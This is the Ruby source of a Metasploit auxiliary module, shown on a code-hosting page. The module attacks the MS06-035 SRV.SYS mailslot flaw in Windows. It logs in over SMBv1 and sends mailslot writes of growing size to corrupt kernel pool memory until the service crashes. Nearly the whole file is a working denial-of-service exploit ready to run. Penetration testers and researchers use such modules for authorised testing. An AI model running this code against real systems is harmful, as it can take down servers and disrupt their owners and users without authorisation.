Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb
19612 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Exploit::Remote::SMB::Client
8
include Msf::Auxiliary::Dos
9
10
def initialize(info = {})
11
super(
12
update_info(
13
info,
14
'Name' => 'Microsoft SRV.SYS Mailslot Write Corruption',
15
'Description' => %q{
16
This module triggers a kernel pool corruption bug in SRV.SYS. Each
17
call to the mailslot write function results in a two byte return value
18
being written into the response packet. The code which creates this packet
19
fails to consider these two bytes in the allocation routine, resulting in
20
a slow corruption of the kernel memory pool. These two bytes are almost
21
always set to "\xff\xff" (a short integer with value of -1).
22
},
23
24
'Author' => [ 'hdm' ],
25
'License' => MSF_LICENSE,
26
'References' => [
27
['BID', '19215'],
28
['OSVDB', '27644'],
29
['CVE', '2006-3942'],
30
['URL', 'http://www.coresecurity.com/common/showdoc.php?idx=562&idxseccion=10'],
31
['MSB', 'MS06-035'],
32
],
33
'Actions' => [
34
['Attack', { 'Description' => 'Run Denial of Service' }],
35
],
36
'DefaultAction' => 'Attack',
37
'DisclosureDate' => '2006-07-11',
38
'Notes' => {
39
'Stability' => [CRASH_SERVICE_DOWN],
40
'SideEffects' => [],
41
'Reliability' => []
42
}
43
)
44
)
45
46
register_options(
47
[
48
OptString.new('MAILSLOT', [ true, 'The mailslot name to use', 'Alerter']),
49
]
50
)
51
52
deregister_options('SMB::ProtocolVersion')
53
end
54
55
# MAILSLOT: HydraLsServer
56
# MAILSLOT: Messngr
57
# MAILSLOT: 53cb31a0\\UnimodemNotifyTSP
58
59
def run
60
case action.name
61
when 'Attack'
62
63
print_status('Mangling the kernel, two bytes at a time...')
64
65
connect(versions: [1])
66
smb_login
67
68
1.upto(1024) do |i|
69
if (i % 100 == 0)
70
print_status("Sending request containing #{i} bytes...")
71
end
72
73
begin
74
simple.client.trans_mailslot('\\MAILSLOT\\' + datastore['MAILSLOT'], 'X' * i)
75
rescue ::Interrupt
76
break
77
rescue StandardError => e
78
if (i == 1)
79
print_error("Failed to write any data to the mailslot: #{e}")
80
break
81
end
82
print_error("Exception occurred on iteration #{i}")
83
print_error("Error: #{e.class} > #{e}")
84
break
85
end
86
end
87
88
# Errors:
89
# 0xc0000034 = object not found
90
# 0xc0000205 = insufficient resources (too much data)
91
92
end
93
94
disconnect
95
end
96
end
97
98